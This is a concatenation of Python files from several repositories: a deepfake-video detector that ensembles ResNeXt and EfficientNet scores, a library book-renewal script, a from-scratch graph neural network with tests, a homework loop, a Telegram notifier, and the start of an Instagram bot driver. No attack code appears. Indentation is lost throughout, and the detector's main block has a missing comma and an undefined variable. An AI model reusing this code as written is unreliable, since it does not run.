x, y, w, h = int(bbox[2]), int(bbox[0]), int(bbox[3] - bbox[2]), int(bbox[1] - bbox[0])
img = frame[y:y + h, x:x + w]
cv2.imwrite("FaceCrops/" + video_name + "/" + "Person" + str(person_no) + "/" + "Frame0.jpg", img)
person_no += 1
multiTracker = cv2.MultiTracker_create()
for i in range(0, len(person_boxes)):
bbox = person_boxes[i]
x, y, w, h = int(bbox[2]), int(bbox[0]), int(bbox[3] - bbox[2]), int(bbox[1] - bbox[0])
bbox = [x, y, w, h]
multiTracker.add(cv2.TrackerKCF_create(), frame, tuple(bbox))
frame_number = 1
total_frames = 1
while vid.isOpened():
skip_rate = vid.get(cv2.CAP_PROP_FRAME_COUNT)//self.sample_rate
ret, frame = vid.read()
if not ret:
break
ret, boxes = multiTracker.update(frame)
if total_frames == self.sample_rate:
break
if frame_number % skip_rate != 0:
frame_number += 1
continue
total_frames += 1
person_no = 1
for i, newbox in enumerate(boxes):
x, y, w, h = newbox
img = frame[int(y):int(y + h), int(x):int(x + w)]
cv2.imwrite("FaceCrops/" + video_name + "/" + "Person" + str(person_no) + "/" + "Frame" + str(frame_number) + ".jpg", img)
person_no += 1
if cv2.waitKey(1) & 0xFF == 27:
break
frame_number += 1
except Exception as e:
print(e)
pass
cuda.close()
class Utils:
def __init__(self, frames_per_video):
self.frames_per_video = frames_per_video
self.input_size = 150
self.input_size2 = 224
"""
Function :- isotropically_resize_image
Resize the face image as per the input size of the inception model.
Input :
img :- Face Crops generated from the main frame of the video.
size :- Width/Height of the image. (Image is supposed to be a square)
Returns :
resized :- Resized image with it's higher dimension equal to size.
"""
def isotropically_resize_image(self, img, size, resample=cv2.INTER_AREA):
h, w = img.shape[:2]
if w > h:
h = h * size // w
w = size
else:
w = w * size // h
h = size
resized = cv2.resize(img, (w, h), interpolation=resample)
return resized
"""
Function :- make_square_image
Add borders to the image in order to change the shape of image to a square.
Input :
img :- Resized face crops from the isotropically_resize_image function.
Returns :
square_image :- Square image with a border of height (size-h) and width (size-w).
"""
def make_square_image(self, img):
h, w = img.shape[:2]
size = max(h, w)
t = 0
b = size - h
l = 0
r = size - w
return cv2.copyMakeBorder(img, t, b, l, r, cv2.BORDER_CONSTANT, value=0)
"""
Function :- find_number_of_person
Return the number of person id found after completion of detection and tracking algotihms.
Input :
video_face_path :- Path of the folder of a specific video where different person
ID are stored.
Returns :
arr :- Number of different people in the entire video.
"""
def find_number_of_person(self, video_face_path):
arr = os.listdir(video_face_path)
return len(arr)
def generate_image_tensor(self, video_face_path):
person_count = self.find_number_of_person(video_face_path)
person_x = []
for i in range(1,person_count+1):
mypath = video_face_path + "/Person" + str(i)
onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]
x = np.zeros((self.frames_per_video, self.input_size, self.input_size, 3), dtype=np.uint8)
n = 0
for f in onlyfiles:
files = mypath + "/" + f
img = cv2.imread(files)
frame = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
resized_face = self.isotropically_resize_image(frame, self.input_size)
resized_face = self.make_square_image(resized_face)
x[n] = resized_face
n += 1
person_x.append(x)
return person_x
def generate_image_tensor2(self,video_face_path):
person_count = self.find_number_of_person(video_face_path)
person_x = []
for i in range(1, person_count+1):
mypath = video_face_path + "/Person" + str(i)
onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]
x = np.zeros((self.frames_per_video, self.input_size2, self.input_size2, 3), dtype=np.uint8)
n = 0
for f in onlyfiles:
files = mypath + "/" + f
img = image.load_img(files, target_size=(224, 224))
img_tensor = image.img_to_array(img)
img_tensor /= 255.
x[n] = img_tensor
n += 1
person_x.append(x)
return person_x
class results:
def find_best_threshold(self, probability_scores):
accuracy = []
threshold = 0.0
threshold_graph = []
while threshold < 1:
y_pred = []
y_real = []
for keys in probability_scores.keys():
label = int(keys.split("_")[-1])
y_real.append(label)
if probability_scores[keys] > threshold:
y_pred.append(1)
else:
y_pred.append(0)
threshold_graph.append(threshold)
accuracy.append(metrics.accuracy_score(y_real, y_pred))
threshold = threshold + 0.05
print((accuracy))
print("+====================================================+")
print((threshold_graph))
print("+====================================================+")
"""
Function :- generate_report
This function is called in the after the predicted scores of every video in the directory has been
generated. It is mainly used to generate confusion matrix, classification report and accuracy.
Input :
probability_scores :- Dictionary with video names as their keys and there predicted
probability score as the value of that specific key.
threshold :- Real value in between 0 and 1. If probability is more than threshold, then
we will consider video as fake.
Returns :
probability_scores :- Dictionary with video names as their keys and there predicted
probability score as the value of that specific key.
"""
def generate_report(self, probability_scores, threshold):
y_real = []
y_pred = []
y_prob = []
for keys in probability_scores.keys():
label = int(keys.split("_")[-1])
y_real.append(label)
if probability_scores[keys] > threshold:
y_pred.append(1)
else:
y_pred.append(0)
y_prob.append(probability_scores[keys])
print(metrics.confusion_matrix(y_real, y_pred))
print(metrics.accuracy_score(y_real, y_pred))
print(metrics.classification_report(y_real, y_pred))
print("Log Loss value is :-", metrics.log_loss(y_real, y_prob))
def ensemble(self,scores_resnext, scores_efficient):
ensembled = {}
for keys in scores_resnext.keys():
ensembled[keys] = ((0.4 * scores_efficient[keys] + 0.6 * scores_resnext[keys]))
return ensembled
def ensemble3(self,scores_resnext, scores_xception, scores_efficient):
ensembled = {}
for keys in scores_resnext.keys():
ensembled[keys] = ((0.3 * scores_efficient[keys] + 0.2*scores_xception[keys] + 0.5 * scores_resnext[keys]))
return ensembled
def dump_json(self, file_name, dictionary):
with open(file_name+'.json', 'w') as fp:
json.dump(dictionary, fp)
def read_json(self,file_name):
with open(file_name+".json") as f:
scores1 = json.load(f)
return scores1
class RunClassifier1:
def __init__(self, video_directory_path, frames_per_video):
self.utils = Utils(frames_per_video)
self.video_directory_path = video_directory_path
self.frames_per_video = frames_per_video
def load_model_Xception(self):
base_model = Xception(input_shape=(224, 224, 3),
weights='imagenet',
include_top=False,
pooling='avg')
for layer in base_model.layers:
layer.trainable = True
x = base_model.output
x = Dense(512)(x)
x = Dropout(0.1)(x)
x = Activation('relu')(x)
x = Dense(64)(x)
x = Dropout(0.1)(x)
x = Activation('relu')(x)
predictions = Dense(1, activation='sigmoid')(x)
model = Model(inputs=base_model.input, outputs=predictions)
model.compile(loss="binary_crossentropy", optimizer=optimizers.Adam(lr=0.001), metrics=['accuracy'])
model.load_weights("Xception_DeepFakeFull.h5")
test_datagen = ImageDataGenerator(preprocessing_function=preprocess_input)
return model,test_datagen
def load_model_efficient(self):
base_model = EfficientNetB5(weights='imagenet', include_top=False, input_shape=(224, 224, 3))
x = base_model.output
x = GlobalMaxPooling2D()(x)
x = Dense(512)(x)
x = Dropout(0.1)(x)
x = Activation('relu')(x)
x = Dense(64)(x)
x = Dropout(0.1)(x)
x = Activation('relu')(x)
predictions = Dense(1, activation='sigmoid')(x)
model = Model(inputs=base_model.input, outputs=predictions)
model.compile(loss="binary_crossentropy", optimizer=optimizers.Adam(lr=0.001), metrics=['accuracy'])
model.load_weights("EFB5DeepFakes.h5")
test_datagen = ImageDataGenerator(rescale=1./255)
return model,test_datagen
def load_efficient_attention(self):
print("MODEL LOADING..........")
in_lay = Input(shape=(224, 224, 3))
base_model = EfficientNetB6(
input_shape=(224, 224, 3),
weights='imagenet',
include_top=False
)
pt_depth = base_model.get_output_shape_at(0)[-1]
pt_features = base_model(in_lay)
bn_features = BatchNormalization()(pt_features)
# here we do an attention mechanism to turn pixels in the GAP on an off
attn_layer = Conv2D(64, kernel_size=(1, 1), padding='same', activation='relu')(Dropout(0.5)(bn_features))
attn_layer = Conv2D(16, kernel_size=(1, 1), padding='same', activation='relu')(attn_layer)
attn_layer = Conv2D(8, kernel_size=(1, 1), padding='same', activation='relu')(attn_layer)
attn_layer = Conv2D(1, kernel_size=(1, 1), padding='valid', activation='sigmoid')(attn_layer)
# fan it out to all of the channels
up_c2_w = np.ones((1, 1, 1, pt_depth))
up_c2 = Conv2D(pt_depth, kernel_size=(1, 1), padding='same',
activation='linear', use_bias=False, weights=[up_c2_w])
up_c2.trainable = False
attn_layer = up_c2(attn_layer)
mask_features = multiply([attn_layer, bn_features])
gap_features = GlobalAveragePooling2D()(mask_features)
gap_mask = GlobalAveragePooling2D()(attn_layer)
# to account for missing values from the attention model
gap = Lambda(lambda x: x[0] / x[1], name='RescaleGAP')([gap_features, gap_mask])
gap_dr = Dropout(0.25)(gap)
dr_steps = Dropout(0.25)(Dense(128, activation='relu')(gap_dr))
out_layer = Dense(1, activation='sigmoid')(dr_steps)
model = Model(inputs=[in_lay], outputs=[out_layer])
model.compile(loss="binary_crossentropy", optimizer=optimizers.Adam(lr=0.001), metrics=['accuracy'])
model.load_weights("EFB6withAttentionDeepFakes.h5")
model.summary()
test_datagen = ImageDataGenerator(rescale=1./255)
return model,test_datagen
def predict(self):
model, test_datagen = self.load_efficient_attention()
print("Model has been loaded")
arr = os.listdir(self.video_directory_path)
probability_scores = {}
for video in arr:
start = time.time()
val_set_dir = self.video_directory_path+"/"+video
person_count = len(os.listdir(val_set_dir))
test_generator = test_datagen.flow_from_directory(val_set_dir,
target_size=(224, 224),
batch_size=10, class_mode='binary',
color_mode='rgb', shuffle=False)
test_generator.reset()
predictions = model.predict_generator(test_generator, steps=test_generator.samples//10)
per_person = len(predictions)//person_count
y_person = []
for i in range(person_count):
y_person.append(predictions[i*per_person:i*per_person + per_person].mean().item())
probability_scores[video] = max(y_person)
end = time.time()
print(video, ":-", probability_scores[video], "Time Taken :-", end-start)
return probability_scores
class RunResNext:
def __init__(self, video_directory_path, frames_per_video):
self.utils = Utils(frames_per_video)
self.mean = [0.485, 0.456, 0.406]
self.std = [0.229, 0.224, 0.225]
self.normalize_transform = Normalize(self.mean, self.std)
self.model = self.load_model()
self.video_directory_path = video_directory_path
self.frames_per_video = frames_per_video
"""
Function :- load_model
This function is called in the when the object of RunResNext is created. Inception ResNet model is
loaded using the function.
Input :
None
Returns :
model :- Instance of the loaded model.
"""
def load_model(self):
checkpoint = torch.load("resnext.pth", map_location=gpu)
model = MyResNeXt().to(gpu)
model.load_state_dict(checkpoint)
_ = model.eval()
del checkpoint
return model
"""
Function :- predict
This function is called in the after the model has been loaded. It is used predict the probability
score of each video present in the self.video_directory_path.
Input :
None
Returns :
probability_scores :- Dictionary with video names as their keys and there predicted
probability score as the value of that specific key.
"""
def predict(self):
arr = os.listdir(self.video_directory_path)
probability_scores = {}
for video in arr:
video_path = self.video_directory_path+"/"+video
face_tensor = self.utils.generate_image_tensor(video_path)
y_person = []
for i in range(len(face_tensor)):
x = face_tensor[i]
x = torch.tensor(x, device=gpu).float()
x = x.permute((0, 3, 1, 2))
for i in range(len(x)):
x[i] = self.normalize_transform(x[i] / 255.)
with torch.no_grad():
y_pred = self.model(x)
y_pred = torch.sigmoid(y_pred.squeeze())
y_person.append(y_pred[:self.frames_per_video].mean().item())
probability_scores[video] = max(y_person)
print(video, ":-", probability_scores[video])
return probability_scores
if __name__ == "__main__":
frames_per_video = 30
Result = results()
video_directory = "/media/kenil/Kenil/Users/Kenil/Downloads/Final_Project/test_videos"
#Result = results()
face_crop_object = GenerateFaceCrops(video_directory, frames_per_video)
face_crop_object.face_crops()
image_directory = "/media/kenil/Kenil/Users/Kenil/Downloads/Final_Project/Main/FaceCrops"
resnext = RunResNext(image_directory , frames_per_video)
scores1 = resnext.predict()
EfficientNet = RunClassifier1(image_directory frames_per_video)
EfficientNet.load_efficient_attention()
scores2 = EfficientNet.predict()
print("************************************************")
print("ResNext Results")
# Result.find_best_threshold(scores1)
Result.generate_report(scores1, 0.6)
print("************************************************")
print("************************************************")
print("EfficientNet Attention Results")
Result.find_best_threshold(scores4 )
Result.generate_report(scores4, 0.5)
print("************************************************")
print("************************************************")
print("EfficientNet Attention + ResNext Ensemble Results")
ensembled = Result.ensemble(scores4, scores1)
Result.find_best_threshold(ensembled)
Result.generate_report(ensembled, 0.5)
print("************************************************")
|
DMeechan/CompSci-Handybook | library-renew-books.py | <filename>library-renew-books.py
# Note: you need to add Chromedriver to your env var path:
# In fish that means running:
# set PATH $HOME/bin $PATH
import time
import datetime
from splinter import Browser
browser = Browser('chrome', headless=False)
def get_due_status():
today_date = datetime.datetime.today().strftime('%d-%m-%y')
return 'DUE ' + today_date
def login():
# Enter username, wait 5 secs for user to enter password, then click 'log in'
YOUR_USERNAME = 'abcdefgh'
browser.fill('username', YOUR_USERNAME)
browser.fill('password', '')
time.sleep(6)
browser.find_by_value('Log in').click()
def sort_by_due_date():
# Sort by due date
sort_button = browser.find_by_xpath('//*[@id="checkout_form"]/a[1]')
sort_button.click()
def renew():
sort_by_due_date()
# Right now this only renews 2 library books
# TODO: update script to get user input a renew X books
# Or detect how many are due and renew all due books
browser.find_by_id('renew0').click()
browser.find_by_id('renew1').click()
renew_selected_button = browser.find_by_xpath('//*[@id="checkout_form"]/a[6]')
renew_selected_button.click()
confirmation_button = browser.find_by_value('YES')
confirmation_button.click()
url = 'https://library.st-andrews.ac.uk/patroninfo~S5/'
browser.visit(url)
login()
due_status = get_due_status()
print('Checking items due on: ' + due_status)
if browser.is_text_present(due_status):
renew()
else:
print("Exiting: could not find any books due today :D")⏎ |
mo-mo-666/simple-GNN-from-scratch | src/test_GNN.py | import unittest
import numpy as np
from GNN import BinarizationGNN
class TestBinarizationGNN(unittest.TestCase):
def setUp(self):
np.random.seed(0)
def test_defaultparams(self):
feature_dim = 10
gnn = BinarizationGNN(feature_dim)
self.assertEqual(gnn.feature_dim, feature_dim)
self.assertEqual(gnn.learning_rate, 0.0001)
self.assertEqual(gnn.eps, 0.001)
self.assertTrue(all((np.array(gnn.aggregate_weight.shape) == feature_dim).flatten()))
self.assertEqual(gnn.aggregate_feature.shape[0], feature_dim)
feature = np.copy(gnn.aggregate_feature)
feature_defalut = np.zeros(feature_dim)
feature_defalut[0] = 1.
self.assertTrue(all((feature == feature_defalut).flatten()))
def test_aggregate(self):
feature_dim = 4
aggregate_weight = np.ones((feature_dim, feature_dim))
gnn = BinarizationGNN(feature_dim, aggregate_step=1, aggregate_weight=aggregate_weight)
graph = np.zeros((3, 3), dtype=bool)
graph[0, 1] = graph[1, 0] = 1
headout = gnn._aggregate(graph)
self.assertTrue(all((headout == 2).flatten()))
feature_dim = 5
aggregate_weight = np.eye(feature_dim)
gnn = BinarizationGNN(feature_dim, aggregate_step=2, aggregate_weight=aggregate_weight)
headout = gnn._aggregate(graph)
self.assertTrue(all((headout == np.array([2, 0, 0, 0, 0]).flatten())))
aggregate_weight = - np.ones((feature_dim, feature_dim))
gnn = BinarizationGNN(feature_dim, aggregate_step=2, aggregate_weight=aggregate_weight)
headout = gnn._aggregate(graph)
self.assertTrue(all((headout == 0).flatten()))
def test_optimize(self):
graphs = np.zeros((1, 10, 10), dtype=bool)
graphs[0, 1, 0] = graphs[0, 0, 1] = 1
graphs[0, 1, 5] = graphs[0, 5, 1] = 1
graphs[0, 4, 7] = graphs[0, 7, 4] = 1
graphs[0, 8, 1] = graphs[0, 1, 8] = 1
graphs[0, 2, 7] = graphs[0, 7, 2] = 1
graphs[0, 3, 4] = graphs[0, 4, 3] = 1
labels = [1]
gnn = BinarizationGNN(optimizer='SGD')
init_loss = gnn._loss_one(graphs[0], labels[0])
for _ in range(3000):
gnn._optimize(graphs, labels)
after_loss = gnn._loss_one(graphs[0], labels[0])
self.assertTrue(init_loss > after_loss)
gnn = BinarizationGNN(optimizer='momentum')
init_loss = gnn._loss_one(graphs[0], labels[0])
for _ in range(3000):
gnn._optimize(graphs, labels)
after_loss = gnn._loss_one(graphs[0], labels[0])
self.assertTrue(init_loss > after_loss)
if __name__ == '__main__':
unittest.main()
|
mo-mo-666/simple-GNN-from-scratch | src/GNN.py | import numpy as np
class BinarizationGNN:
"""
Graph Newral Network to classify graphs into two.
parameters
----------
feature_dim : int, optional (default = 8)
Dimension of the feature vectors to each graph node.
learning_rate : float, optional (default = 0.001)
Learning rate.
eps : float, optinal (default = 0.001)
Used when calculating numerical gradient.
optimizer : 'SGD' | 'momentun' , optinal (default = 'momentum')
Optimizing algorithm. Possible values:
- 'SGD'
Stochastic Gradient Descent.
- 'momentum'
Momentum SGD.
momentum : float, optional (default = 0.9)
Used when optimizer == 'momentum'.
batch_size : int, optional (default = 10)
Batch size.
epoch : int, optional (defalult = 10)
Epoch.
aggregate_step : int, optional (default = 2)
Aggregation step T.
aggregate_feature : np.ndarray(feature_dim,) or None (default = None)
Initial feature vector when aggregating.
If None, default is np.array([1, 0, 0, 0, ....]).
aggregate_weight : np.ndarray(feature_dim, feature_dim) or None (default = None)
Initial weight W in aggregation.
If None, default is created by using aggregate_weight_param.
aggregate_weight_param : dict (key:: 'mu', 'sigma') (default = {'mu': 0, 'sigma': 0.4})
This parameter is used when aggregate_weight is None.
Initial weight W is initialized with a normal distribution with mean 'mu' and standard deviation 'sigma'.
aggregate_activate_func : 'sigmoid' | 'relu' | 'swish' (default = 'relu')
An Activation function when aggregating.
feature_vect_each_weight : np.ndarray(feature_dim) or None (default = None)
Initial weight A when calculating the weighted sum of feature vectors.
feature_vect_add_weight : float (default = 0)
Initial weight b when calculating the score of feature vectors.
"""
def __init__(self,
feature_dim: int=8,
learning_rate: float=0.0001,
eps: float=0.001,
optimizer :str='momentum',
momentum: float=0.9,
batch_size: int=10,
epoch: int=10,
aggregate_step: int=2,
aggregate_feature: np.ndarray=None,
aggregate_weight: np.ndarray=None,
aggregate_weight_param: dict={'mu': 0, 'sigma': 0.4},
aggregate_activate_func: str='relu',
feature_vect_each_weight: np.ndarray=None,
feature_vect_each_weight_param: dict={'mu': 0, 'sigma': 0.4},
feature_vect_add_weight: float=0):
self.feature_dim = feature_dim
self.learning_rate = learning_rate
self.eps = eps
self.optimizer = optimizer
self.momentum = momentum
self.batch_size = batch_size
self.epoch = epoch
self.aggregate_step = aggregate_step
if aggregate_feature is not None:
self.aggregate_feature = np.copy(aggregate_feature)
else:
self.aggregate_feature = np.zeros(feature_dim, dtype=np.float32)
self.aggregate_feature[0] = 1.
self.aggregate_weight_param = aggregate_weight_param
if aggregate_weight is not None:
self.aggregate_weight = np.copy(aggregate_weight)
else:
self.aggregate_weight = (np.random.randn(self.feature_dim, self.feature_dim) * self.aggregate_weight_param['sigma'] + self.aggregate_weight_param['mu']).astype(np.float32)
self.aggregate_activate_func = aggregate_activate_func
self.feature_vect_each_weight_param = feature_vect_each_weight_param
if feature_vect_add_weight:
self.feature_vect_each_weight = np.copy(feature_vect_each_weight)
else:
self.feature_vect_each_weight = (np.random.randn(self.feature_dim) * self.feature_vect_each_weight_param['sigma'] + self.feature_vect_each_weight_param['mu']).astype(np.float32)
self.feature_vect_add_weight = feature_vect_add_weight
self.learning_params = [self.aggregate_weight, self.feature_vect_each_weight, self.feature_vect_add_weight]
self.aggregate_weight_d = 0
self.feature_vect_each_weight_d = 0
self.feature_vect_add_weight_d = 0
self.learning_params_d = [self.aggregate_weight_d, self.feature_vect_each_weight_d, self.feature_vect_add_weight_d]
def _aggregate(self, graph: np.ndarray, learning_params: list=None) -> np.ndarray:
"""
Aggregate some steps and return head out.
parameters
----------
graph : np.ndarray
Single graph.
learning_params : list, optional (default = None)
Learing parameters.
If None, defalut is self.learning_params.
returns
----------
head_out : np.ndarray(feature_dim)
The head out of the aggregation.
"""
graph = np.copy(graph).astype(np.float32)
if not learning_params:
learning_params = self.learning_params
weight = np.copy(learning_params[0])
if self.aggregate_activate_func == 'sigmoid':
f = lambda X: (np.tanh(X / 2.) + 1.) / 2.
if self.aggregate_activate_func == 'relu':
f = lambda X: np.maximum(X, 0)
if self.aggregate_activate_func == 'swish':
f = lambda X: X * (np.tanh(X / 2.) + 1.) / 2.
n = graph.shape[0]
X = np.copy(self.aggregate_feature)
X = np.tile(X, (n, 1))
for _ in range(self.aggregate_step):
A = np.dot(graph, X)
X = np.dot(A, weight)
X = f(X)
# HEADOUT
head_out = np.sum(X, axis=0)
return head_out
def _rawscore_one(self, graph: np.ndarray, learning_params: list=None) -> float:
"""
Calcurate score after aggregating step.
parameters
----------
graph : np.ndarray
Single graph.
learning_params : list, optional (default = None)
Learing parameters.
If None, defalut is self.learning_params.
returns
----------
s : float
The value of the score.
"""
if not learning_params:
learning_params = self.learning_params
h = self._aggregate(graph, learning_params)
feature_vect_each_weight, feature_vect_add_weight = learning_params[1:]
s = np.dot(feature_vect_each_weight, h) + feature_vect_add_weight
return s
def _predict_one(self, graph: np.ndarray) -> bool:
"""
Predict a label of a single graph.
parameters
----------
graph : np.ndarray
Single graph.
returns
----------
s > 0 : bool
The predicted label.
"""
s = self._rawscore_one(graph)
return s > 0
def _loss_one(self, graph: np.ndarray, label: bool, learning_params: list=None) -> float:
"""
Calculate the loss score of a single graph.
parameters
----------
graph : np.ndarray
Single graph.
label : bool
The correct answer label of the graph.
learning_params : list, optional (default = None)
Learing parameters.
If None, defalut is self.learning_params.
returns
----------
loss : float
The value of the loss.
"""
label = float(label)
s = self._rawscore_one(graph, learning_params)
if -100 < s < 100:
loss = label * np.log(1 + np.exp(-s)) + (1 - label) * np.log(1 + np.exp(s))
elif s < 0:
loss = label * s + (1 - label) * np.log(1 + np.exp(s))
else:
loss = label * np.log(1 + np.exp(-s)) + (1 - label) * s
return loss
def loss(self, graphs: np.ndarray, labels: list) -> float:
"""
Calculate the avarage loss score of a single graph.
parameters
----------
graphs : np.ndarray
Correction of graphs.
labels : list
The list of correct answer labels of the graphs.
learning_params : list, optional (default = None)
Learing parameters.
If None, defalut is self.learning_params.
returns
----------
loss : float
The value of the loss.
"""
loss = 0
n = len(labels)
for graph, label in zip(graphs, labels):
loss += self._loss_one(graph, label) / n
return loss
def _gradient_one(self, graph: np.ndarray, label: bool) -> list:
"""
Calculate the gradient of the loss score of a single graph.
parameters
----------
graph : np.ndarray
Single graph.
label : bool
The correct answer label of the graph.
learning_params : list, optional (default = None)
Learing parameters.
If None, defalut is self.learning_params.
returns
----------
g_aggregate_weight : np.ndarray
Gradient of the aggregate_weight parameters.
g_feature_vect_each_weight : np.ndarray
Gradient of the feature_vect_each_weight parameters.
g_feature_vect_add_weight : float
Gradient of the feature_vect_add_weight parameters.
"""
loss = self._loss_one(graph, label)
aggregate_weight, feature_vect_each_weight, feature_vect_add_weight = self.learning_params
d1, d2 = aggregate_weight.shape
g_aggregate_weight = np.zeros_like(aggregate_weight)
for i in range(d1):
for j in range(d2):
plus = np.copy(aggregate_weight)
plus[i, j] += self.eps
learning_params = [plus, feature_vect_each_weight, feature_vect_add_weight]
lossplus = self._loss_one(graph, label, learning_params)
diff = (lossplus - loss) / self.eps
g_aggregate_weight[i, j] = diff
d, = feature_vect_each_weight.shape
g_feature_vect_each_weight = np.zeros_like(feature_vect_each_weight)
for i in range(d):
plus = np.copy(feature_vect_each_weight)
plus[i] += self.eps
learning_params = [aggregate_weight, plus, feature_vect_add_weight]
lossplus = self._loss_one(graph, label, learning_params)
diff = (lossplus - loss) / self.eps
g_feature_vect_each_weight[i] = diff
plus = feature_vect_add_weight + self.eps
learning_params = [aggregate_weight, feature_vect_each_weight, plus]
lossplus = self._loss_one(graph, label, learning_params)
diff = (lossplus - loss) / self.eps
g_feature_vect_add_weight = diff
return g_aggregate_weight, g_feature_vect_each_weight, g_feature_vect_add_weight
def _optimize(self, graphs: np.ndarray, labels: list):
"""
Calculate the gradient of the loss score of a single graph and optimize the learning parameters.
parameters
----------
graphs : np.ndarray
Correction of graphs.
labels : list
The list of correct answer labels of the graphs.
"""
n = graphs.shape[0]
delta_aggregate = 0
delta_feature_vect_each = 0
delta_feature_vect_add = 0
for graph, label in zip(graphs, labels):
g_aggregate_weight, g_feature_vect_each_weight, g_feature_vect_add_weight = self._gradient_one(graph, label)
delta_aggregate += g_aggregate_weight / n
delta_feature_vect_each += g_feature_vect_each_weight / n
delta_feature_vect_add += g_feature_vect_add_weight / n
if self.optimizer == 'SGD':
self.aggregate_weight_d = -self.learning_rate * delta_aggregate
self.feature_vect_each_weight_d = -self.learning_rate * delta_feature_vect_each
self.feature_vect_add_weight_d = -self.learning_rate * delta_feature_vect_add
self.aggregate_weight += self.aggregate_weight_d
self.feature_vect_each_weight += self.feature_vect_each_weight_d
self.feature_vect_add_weight += self.feature_vect_add_weight_d
if self.optimizer == 'momentum':
self.aggregate_weight_d = -self.learning_rate * delta_aggregate + self.momentum * self.aggregate_weight_d
self.feature_vect_each_weight_d = -self.learning_rate * delta_feature_vect_each + self.momentum * self.feature_vect_each_weight_d
self.feature_vect_add_weight_d = -self.learning_rate * delta_feature_vect_add + self.momentum * self.feature_vect_add_weight_d
self.aggregate_weight += self.aggregate_weight_d
self.feature_vect_each_weight += self.feature_vect_each_weight_d
self.feature_vect_add_weight += self.feature_vect_add_weight_d
self.learning_params = [self.aggregate_weight, self.feature_vect_each_weight, self.feature_vect_add_weight]
self.learning_params_d = [self.aggregate_weight_d, self.feature_vect_each_weight_d, self.feature_vect_add_weight_d]
def fit(self, graphs: np.ndarray, labels: list):
"""
Fit the data.
IF YOU CALL THIS METHOD TWO OR MORE TIMES, YOU CAN FIT ADDITIONAL EPOCH.
parameters
----------
graphs : np.ndarray
Correction of graphs.
labels : list
The list of correct answer labels of the graphs.
"""
num = graphs.shape[0]
for _ in range(self.epoch):
shuffle_idx = np.random.permutation(np.arange(num))
shuffle_graphs = graphs[shuffle_idx]
shuffle_labels = np.array(labels)[shuffle_idx].tolist()
for i in range(num // self.batch_size):
batch_graphs = shuffle_graphs[i*self.batch_size:(i+1)*self.batch_size]
batch_labels = shuffle_labels[i*self.batch_size:(i+1)*self.batch_size]
self._optimize(batch_graphs, batch_labels)
def predict(self, graphs: np.ndarray) -> list:
"""
Predict the labels of the given graphs.
parameters
----------
graphs : np.ndarray
Correction of graphs.
returns
----------
labels : list
List of the labels.
"""
labels = list()
for graph in graphs:
labels.append(self._predict_one(graph))
return labels
def predict_prob(self, graphs: np.ndarray, labels: list) -> float:
"""
Accuracy of the predict.
parameters
----------
graphs : np.ndarray
Correction of graphs.
labels : list
The list of correct answer labels of the graphs.
returns
----------
prob : float
Correct answer rate.
"""
predict_labels = self.predict(graphs)
n = len(labels)
prob = sum([l == p for l, p in zip(labels, predict_labels)]) / n
return prob
|
gmunozhe/astr-119-hw-1 | check_in_solution.py | #include the Numpy library
import numpy as np
#define the main() function
def main():
i=0 #declare an integer i
x=119.0 #declare a float x
for i in range(120): #loop i from 0 to 119, inclusive
if((i%2)==0): #if i is even
x += 3. #add 3 to x
else: #if i is odd
x -= 5. #subtract 5 from x
s = "%3.2e" % x #make a string containing x with
#sci. notation w/ 2 decimal place
print(s) #print s to the screen
#now the rest of the program continues
if __name__ == "__main__": #if the main() function exists, run it
main()
|
PhilippMatthes/instabot | Mailer.py | <reponame>PhilippMatthes/instabot
import telepot
import telepot.api
import urllib3
import pickle
import matplotlib.pyplot as plt
telepot.api._pools = {
'default': urllib3.PoolManager(num_pools=3, maxsize=10, retries=10, timeout=240),
}
class Mailer:
def __init__(self):
try:
with open("log/telepot_api_key.pickle","rb") as f:
self.key = pickle.load(f)
except:
key = input("Telepot api key was not discovered. Please enter your Key: ")
while len(key) != 45:
key = input("The key you entered is no valid Telegram API key. Please try again: ")
with open("log/telepot_api_key.pickle","wb") as f:
pickle.dump(key,f)
self.key = key
try:
with open("log/telepot_user_number.pickle","rb") as f:
self.telepot_user_number = pickle.load(f)
except:
telepot_user_number = input("User key was not discovered. Please enter your Key: ")
while len(telepot_user_number) != 9:
telepot_user_number = input("The key you entered is no valid user key. Please try again: ")
with open("log/telepot_user_number.pickle","wb") as f:
pickle.dump(telepot_user_number,f)
self.telepot_user_number = telepot_user_number
def send(self,text):
self.bot = telepot.Bot(self.key)
self.bot.sendMessage(self.telepot_user_number,text)
def send_image(self,image,caption):
self.bot = telepot.Bot(self.key)
with open(image, 'rb') as f:
self.bot.sendPhoto(self.telepot_user_number,f,caption)
def send_stats(self,numbers,hashtags,caption):
if len(numbers) != len(hashtags):
raise Exception("Number length doesnt equal hashtags length")
fig = plt.figure()
x = range(0,len(hashtags))
y = numbers
labels = hashtags
plt.plot(x,y, 'r')
plt.xticks(x, labels, rotation='vertical')
plt.margins(0.2)
image = "log/stats.png"
fig.savefig(image)
self.send_image(image,caption)
def get_current_message(self):
try:
self.bot = telepot.Bot(self.key)
updates = self.bot.getUpdates()
if len(updates) == 0:
return ""
else:
message_offset = updates[len(updates)-1]["update_id"]
current_message = self.bot.getUpdates(offset = message_offset)
return current_message[0]["message"]["text"]
except:
return ""
|
PhilippMatthes/instabot | InstaDriver.py | <filename>InstaDriver.py
from selenium import webdriver # For webpage crawling
from time import sleep
import time
from selenium.webdriver.common.keys import Keys # For input processing
from random import randint
import sys # For file path processing
import datetime # For timestamp
import pickle # For data management
import os
from Mailer import Mailer
from Config import Config
if Config.headless_is_available:
from xvfbwrapper import Xvfb
# from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
# dcap = dict(DesiredCapabilities.PHANTOMJS)
# dcap["phantomjs.page.settings.userAgent"] = \
# ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36")
class Driver(object):
def __init__(self):
# Set up Telegram Message Client
self.mailer = Mailer()
# Set up virtual display
if Config.headless_is_available:
self.display = Xvfb()
self.display.start()
# Load history
try:
with open("log/interacting_users.pickle","rb") as f:
self.interacting_users = pickle.load(f)
except:
with open("log/interacting_users.pickle","wb") as f:
self.interacting_users = []
pickle.dump([],f)
try:
with open("log/hashtags.pickle","rb") as f:
self.hashtags = pickle.load(f)
except:
with open("log/hashtags.pickle","wb") as f:
self.hashtags = {}
for h in Config.topics:
self.hashtags[h] = 2
pickle.dump(self.hashtags,f)
try:
with open("log/actionList.pickle","rb") as f:
self.actionList = pickle.load(f)
except:
